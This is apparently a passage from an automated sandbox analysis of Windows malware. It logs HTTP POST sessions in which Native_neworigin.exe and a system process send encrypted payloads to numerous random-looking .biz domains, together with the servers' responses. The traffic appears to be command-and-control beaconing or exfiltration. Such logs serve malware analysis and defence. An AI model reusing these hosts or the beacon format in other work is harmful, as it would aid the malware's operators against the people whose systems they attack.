                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.762635946 CET834OUTData Raw: f2 70 f5 5c 71 bf de 59 36 03 00 00 21 20 fb c8 62 6c c5 a8 00 0a 3f 04 97 e0 9c f2 6c ad 75 d1 f6 f0 7a 69 4e d0 a6 70 40 61 4b e2 e8 13 94 29 12 ae 57 f8 bd 90 37 33 f3 02 67 7d 5e 6c 82 8a 07 04 f8 c6 b5 87 31 39 3b bd 5b 46 c8 67 79 2f 02 58
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: p\qY6! bl?luziNp@aK)W73g}^l19;[Fgy/XuS0F7A.8t<5Ym,/TFcTC^fhS\r]VMvTsRE=5A>B_1Qc<l~mzSBXLq[3zeg3+


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    45192.168.2.105002654.244.188.177806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.908735991 CET355OUTPOST /qlejchqklyh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.908778906 CET778OUTData Raw: de 4c 10 4c ef 33 52 e4 fe 02 00 00 3f 1f db 2d bb 68 ca 5b de 52 69 36 04 e9 91 26 76 a4 e6 2e 0f 45 4d a5 d1 f8 68 6c 21 2c 53 e2 e5 a5 96 e1 a1 4e cf 99 f3 e8 4c bb d5 26 71 6f b9 80 25 91 23 9e 18 7a 17 54 03 b7 79 3f 65 e4 ce a7 c9 08 d8 62
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: LL3R?-h[Ri6&v.EMhl!,SNL&qo%#zTy?ebn"vHOnvcJ|Z|aEuHy"zjJGTZu]>_O"f*eYb?4n;W1A;|[/OCqgIqe1m\
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.341267109 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=858c1a0b5aa389418d8386438d1cbb67|8.46.123.75|1732605291|1732605291|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    46192.168.2.1050027172.234.222.138807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.103256941 CET347OUTPOST /fvlqmp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.103306055 CET834OUTData Raw: 05 ba fe 3b d9 b0 04 ab 36 03 00 00 19 6c 67 55 6d 01 83 c8 84 98 f6 e7 56 02 d6 f5 84 f3 7f c1 06 c1 c6 2d 7a 5a 47 02 79 78 6f f7 4e d8 ef ed 58 9f d8 25 d6 b5 4c 25 60 be 56 9b 83 9f 76 0a ae 9a ef b8 de 35 8d e3 aa 43 54 a1 47 5c ef 28 f7 40
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;6lgUmV-zZGyxoNX%L%`Vv5CTG\(@Y(sxB!R!2!`f*4GlGS,yOH2fsOYLKxMZkTRM;%Au]5sM49qkN0ht1rjSL "Euk@G&


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    47192.168.2.105002834.246.200.160807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.633224964 CET348OUTPOST /jmyxny HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.633224964 CET834OUTData Raw: e5 e6 63 5e 4b 55 77 43 36 03 00 00 6b 2e fa 1d 41 5b 1d 3e a0 cf 5b 42 49 99 95 39 4d 92 c8 f8 96 95 c1 70 fc 4d 1b 7e 11 e3 f6 2b 92 ab 55 a2 9f 1e 35 95 8b 3a 5b ed 1e 61 0b e8 9e 5f 68 65 61 53 0c 72 33 e2 e5 cb 51 37 d5 40 8e a4 50 5b 53 95
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: c^KUwC6k.A[>[BI9MpM~+U5:[a_heaSr3Q7@P[SN&=M$>9,,uu[Vzh3-Y`KJE7N<~udaTuf}gR(,%sHBp%(f8b`t$e4.>_weKHU%BKf|z
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.057336092 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=1f2db45fd0299ddb26b8c2a95261dd1b|8.46.123.75|1732605292|1732605292|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    48192.168.2.105002935.164.78.200806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:52.061834097 CET349OUTPOST /fshqbiv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:52.061834097 CET778OUTData Raw: 76 a9 bc 6e c4 ef 98 0e fe 02 00 00 c3 af 1f da 15 ff 4d 0f 95 6a 22 17 ab 2d 09 0a 8f ff 99 b7 69 b2 ef fb 36 49 36 1c 51 7c a1 e5 09 6d 0c 32 66 69 86 be 14 83 57 e5 22 ca c8 c4 52 cd 02 e0 8b 16 82 ad 99 9f e9 c0 26 d2 a0 bb 1d 4d 79 5e fd a7
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: vnMj"-i6I6Q|m2fiW"R&My^bYxNc!Ya`eE?UsA?n@&uWU~ HJYYD,X1"/ka9j(&~_w'gLje*C1sc~!fdBDf3%9
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.514050961 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c5d0dcb92e2562f7161f9690fba6e090|8.46.123.75|1732605293|1732605293|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    49192.168.2.105003018.208.156.248807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.408643007 CET349OUTPOST /tipcpxgs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.408674002 CET834OUTData Raw: 17 ec 14 52 65 f8 49 e7 36 03 00 00 2f a2 89 8a 32 c6 46 3c 97 ab e8 75 fd 63 5e d6 3b a1 fc cd 66 e8 84 bd 13 56 88 ca 80 f2 20 d5 2b c8 dc d6 19 c0 ea aa 3a ac 48 8c 6b bd 01 1d e3 87 33 a2 93 17 32 d5 1c e6 63 b3 1c 9b 08 ab 2d 02 9e 60 1f 2e
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ReI6/2F<uc^;fV +:Hk32c-`.kwe%y/SIbEsfs`M0|vm{hQO}-|P^q44t^-sOUi4'.FQVR_@5SE?Z["};KdsJ
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.551651001 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=ed6322541279954a75eccc533b702fbf|8.46.123.75|1732605294|1732605294|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    50192.168.2.10500313.94.10.34806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.182830095 CET359OUTPOST /qkmbmbtlinurxa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.182858944 CET778OUTData Raw: dd 3c ae 9b 3a 97 7f be fe 02 00 00 a4 d0 72 5a 91 28 d2 ce dd ca 86 6a a5 99 3a 96 69 13 66 cd 17 11 76 07 78 79 26 06 f6 68 1e 95 ac bb 9b 14 d9 95 3c 0f 1f 66 22 c0 b9 71 8b 1b ae f7 35 a0 9e f1 55 79 dd 01 35 eb 67 4c 23 fe e3 f6 49 fe 81 b9
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <:rZ(j:ifvxy&h<f"q5Uy5gL#I%<ohOV?*[9;G%1.Yq@"Q=qeU}0]pxTBSg[@X_13)RB4e]=woNr8)}GE.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.325854063 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:55 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=5f76781d8912ef9c37ae12f12fb24dc5|8.46.123.75|1732605295|1732605295|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    51192.168.2.1050032208.100.26.245807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.867569923 CET355OUTPOST /mhnfavogqkp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.867599010 CET834OUTData Raw: 3a 7c 65 8b a6 24 f0 a9 36 03 00 00 d4 8b c9 5f 80 35 22 3e 65 c7 31 6f dc 35 07 ae cb 4a f6 31 37 1a 42 75 cc f4 0f 35 96 3d 79 f5 21 1e 9f 8c 5b 1d 80 75 97 c0 ee 23 12 a6 91 16 bb f4 9d 7a d1 fb 49 4a 88 a0 a2 02 a8 a4 a5 9a b4 34 c4 5f ad 00
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :|e$6_5">e1o5J17Bu5=y![u#zIJ4_"cjpbBQDvjKlH3!v_`c,M/bk{/#?j!(#O\Uih(%'Te$tO$fww1I9~+~=Gj
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.086076975 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:55 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    52192.168.2.1050033165.160.15.20806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603490114 CET351OUTPOST /omaxykiwlg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603517056 CET778OUTData Raw: 49 b1 27 ab 9d bd 29 6e fe 02 00 00 ce 6c 51 4a a5 d6 54 b3 f8 91 31 81 7c e5 8f 43 33 a6 36 80 16 68 00 13 88 44 47 ce 48 90 ae 87 18 a8 29 98 df e2 d7 8f b2 bc c1 7a 60 f2 21 80 d9 13 7d 53 23 bc e3 f2 f6 f2 07 ba d0 70 a1 3e 79 87 02 e8 97 63
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: I')nlQJT1|C36hDGH)z`!}S#p>ychzkmjo)_* NlQ }l{L\t+haa!7-fai8e`!Tm(RqYn,A{@ a]B\q,oT-eB2
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.906814098 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:56 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909790993 CET342OUTPOST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909827948 CET778OUTData Raw: a0 81 8d d0 83 ea 61 61 fe 02 00 00 ae 76 79 b6 37 39 f6 f8 8f 81 45 1a 79 ce 49 b3 3e 63 4d a9 91 46 f5 26 62 3d 64 0c 61 8b 41 fb 25 ba 33 27 aa c6 12 14 d5 6b ed ba 8d 45 9b b2 4b 23 fb 18 9a 31 3e ff 48 f4 ca 08 78 f2 8a 4f 46 90 67 69 0d e9
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: aavy79EyI>cMF&b=daA%3'kEK#1>HxOFgiUH_O6RXf>P*(vJy"/0>d>jt*MO/[r[T=k\.mHyg1mNXIx5m=uHi&l@
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.322197914 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:57 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    53192.168.2.1050034208.100.26.245807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.282088041 CET356OUTPOST /mggqfmrkiurp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.282118082 CET834OUTData Raw: fb 64 6a 89 c7 b0 b6 4f 36 03 00 00 4c a3 6e 69 82 e4 68 53 d8 31 b9 bb cc 1e 29 8d 4d f4 40 a9 2b 92 29 0b 62 d7 9a d1 70 86 9d 83 52 90 72 99 62 00 b0 69 eb 00 43 45 3e ea 49 9d 62 b1 a7 ac 4e cd a5 d3 bd 43 44 f9 63 9c cf dd 98 21 18 80 61 05
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: djO6LnihS1)M@+)bpRrbiCE>IbNCDc!aVoz)XZT*BtQ&~^#gWw3oChz.YU#}z#9bpFH1AY^kIUj 43PQ4aH.4Xz2
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.448985100 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:57 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
